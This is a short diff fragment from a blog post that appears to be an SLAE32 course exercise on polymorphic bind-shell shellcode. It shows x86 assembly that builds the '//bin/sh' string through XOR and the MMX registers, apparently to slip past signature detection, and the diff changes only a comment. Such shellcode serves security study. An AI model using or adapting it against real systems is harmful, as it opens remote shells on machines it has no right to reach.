boku7/boku7.github.io/_posts/2019-09-08-SLAE32_6-1_polyMMXbindSh.md

 jne    dup2Loop

 push   edx
- mov edx, 0xffffffff     ; will be used to XOR the MM0 Register to result in "//bin/sh" mov eax, 0x978cd091     ; "n/sh" XOR'd with 0xffffffff
+ mov edx, 0xffffffff     ; used to XOR the MM0 Register to result in "//bin/sh" mov eax, 0x978cd091     ; "n/sh" XOR'd with 0xffffffff
  movd mm0, eax
  psllq mm0, 32           ; shift the mm0 register left by 4 bytes